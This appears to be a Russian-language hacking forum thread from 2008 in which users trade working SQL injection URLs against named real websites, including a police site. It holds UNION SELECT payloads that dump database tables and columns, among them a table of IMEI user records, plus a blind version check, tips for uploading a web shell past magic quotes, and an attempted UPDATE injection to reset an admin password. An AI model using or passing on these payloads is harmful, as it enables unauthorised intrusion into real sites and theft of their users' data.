 |
|
30.12.2008, 22:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Thrasher88
фильтрирует...
F4R
заабей... )
юниона нема? (
http://www.hawkingtech.com/downloads.php?file_id=2340+union+select+1/*
иьект у мусаров?
http://rpolice.ru/download.php?file_id=-176+or+1=1
Последний раз редактировалось sabe; 30.12.2008 в 22:33..
|
|
|
30.12.2008, 22:45
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
http://dixis.ru/actions.php?act_id=-347+union+select+1,version(),table_name,4,5,6,7,8, 9,10,11,12+from+information_schema.tables+limit+1, 1%20--
почему ошибка?
|
|
|
|
30.12.2008, 22:59
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Для начало - там 13 столбцов...
Код:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a,table_rows),4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
To sabe:
Код:
http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version(),1,1)=3
3-я ветка..
Последний раз редактировалось R1dex; 30.12.2008 в 23:04..
|
|
|
|
30.12.2008, 23:35
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
а как например вывести колонки из IMEI_users ???
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name,0x3a ),4,5,6,7,8,9,10,11,12,13+from+information_schema. columns--
|
|
|
|
30.12.2008, 23:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Вот так.
Код:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x494d45495f7573657273--
|
|
|
|
31.12.2008, 01:11
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
|
|
|
|
31.12.2008, 01:18
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от Octave_Parango
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.p...5&postcount=39
Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.
|
|
|
|
31.12.2008, 01:41
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
По-идее при SQL-инъекции в MySQL можно использовать команду UPDATE, так? Подскажите, как тогда будет выглядеть запрос к БД? Примерно так?
http://localhost/index.php?id=-1+update+1,2,3,4,5,6+название_таблиц ы+set+password='admin'+where+id='1'--
|
|
|
|
31.12.2008, 01:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
sql надо изучать с бд, а не с sql-inj тогда не будет таких глупых вопросов  |
|
|
|
31.12.2008, 01:52
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Народ пытаюсь обновить колонку (инфу о юзере) и когда жму на EDIT
то выскакивает редактирование ПУСТЫХ полей! в чем дело??? Прова на запись есть! (раньше редактировал)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
